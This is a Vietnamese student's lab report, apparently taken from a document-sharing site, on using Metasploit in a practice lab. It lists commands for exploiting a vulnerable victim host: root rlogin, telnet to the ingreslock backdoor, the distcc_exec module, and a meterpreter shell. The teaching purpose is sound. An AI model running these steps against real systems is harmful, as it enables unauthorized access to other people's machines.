Tải bản đầy đủ (.docx) (11 trang)

Cơ sở an toàn thông tin báo cáo thực hành metasploit

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (1.09 MB, 11 trang )

<span class="text_page_counter">Trang 1</span><div class="page_container" data-page="1">

<b><small>BỘ THÔNG TIN VÀ TRUYỀN THÔNG</small></b>

<b><small>HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG</small></b>

<b>CƠ SỞ AN TỒN THƠNG TINBáo cáo thực hành: Metasploit</b>

<b>Sinh viên: Dỗn Hưng NgunMã sinh viên: B21DCVT329</b>

<b>Lớp: E21CQCN03-B</b>

</div><span class="text_page_counter">Trang 2</span><div class="page_container" data-page="2">

Mục lục

I. Tìm hiểu lý thuyết...3 II. Mô tả các bước làm bài tập...3 III. Kết luận...10

</div><span class="text_page_counter">Trang 3</span><div class="page_container" data-page="3">

I. Tìm hiểu lý thuyết

Trong bài thực hành này, có một số khái niệm cơ bản về quy trình khai thác lỗ hổng trên các dịch vụ sử dụng Metasploit.

II. Mô tả các bước làm bài tập - Khởi động bài lab

- Trên terminal attacker và victim sử dụng lệnh “ifconfig” để tìm địa chỉ IP.

- Sử dụng câu lệnh “ping” để kiểm tra kết nối từ máy attacker đến máy Victim.

</div><span class="text_page_counter">Trang 4</span><div class="page_container" data-page="4">

<b>- Sử dụng công cụ nmap để qt các dịch vụ có thể tấn cơng</b>

- Khai thác dịch vụ cấu hình rlogin: rlogin -l root 192.168.1.2

<i>- Sau đó thực hiện mở file filetoview.txt :cat /root/filetoview.txt</i>

</div><span class="text_page_counter">Trang 5</span><div class="page_container" data-page="5">

- Khai thác dịch vụ ingreslock (cổng 1524): telnet 192.168.1.2 1524

<i>- Sau đó thực hiện mở file filetoview.txt :cat /root/filetoview.txt</i>

- Khai thác dịch vụ distccd trong trình điều khiển Metasploit

</div><span class="text_page_counter">Trang 6</span><div class="page_container" data-page="6">

Tìm và tấn cơng dịch vụ distccd: <i>search distccdSử dụng công cụ khai thác “exploit”: use exploit/unix/misc/distcc_exec</i>

Đặt “RHOST” : <i>set RHOST 192.168.1.2Thực hiện khai thác lỗ hổng: exploit</i>

</div><span class="text_page_counter">Trang 7</span><div class="page_container" data-page="7">

<i>- Sau đó thực hiện mở file filetoview.txt: cat /root/filetoview.txt</i>

- Tìm và khai thác dịch vụ IRC daemon trong trình điều khiển Metasploit

</div><span class="text_page_counter">Trang 8</span><div class="page_container" data-page="8">

Thực hiện tương tự như dịch vụ distccd, ta có:

- Tìm và khai thác dịch vụ VSFtpd trong trình điểu khiển Metasploit Thực hiện tương tự như các dịch vụ trên, ta có:

</div><span class="text_page_counter">Trang 9</span><div class="page_container" data-page="9">

Thực hiện tương tự như các dịch vụ trên, ta có:

- Tìm và khai thác dịch vụ HTTP trong trình điều khiển Metasploit

- Sau khi thực hiện exploit xong, 1 lời nhắc tên meterpreter xuất hiện, thực hiện thả shell

</div><span class="text_page_counter">Trang 10</span><div class="page_container" data-page="10">

- Tìm và khai thác dịch vụ Postgres trong trình điểu khiển Metasploit Thực hiện tương tự như dịch vụ HTTP, ta có:

- Kiểm tra kết quả bằng checkwork:

</div><span class="text_page_counter">Trang 11</span><div class="page_container" data-page="11">

III. Kết luận

Sau khi tìm hiểu các khái niệm mạng cơ bản trong mơi trường Linux, ta đã nắm được các kiến thức cơ bản về các dịch vụ cơ bản như rlogin, ingreslock, distccd, IRC daemon, VSFtpd, Samba, HTTP, Postgres. Qua việc thực hiện cài đặt và chạy demo của mỗi loại cơng cụ, ta đã có cơ hội hiểu rõ hơn về cách chúng hoạt động và cách chúng có thể ảnh hưởng đến bảo mật hệ thống và quyền riêng tư, tuy nhiên cũng cần nhớ rằng việc sử dụng các công cụ này phải tuân thủ các quy định pháp luật và đạo đức, và chỉ được thực hiện với mục đích hợp pháp và đạo đức.

</div>

×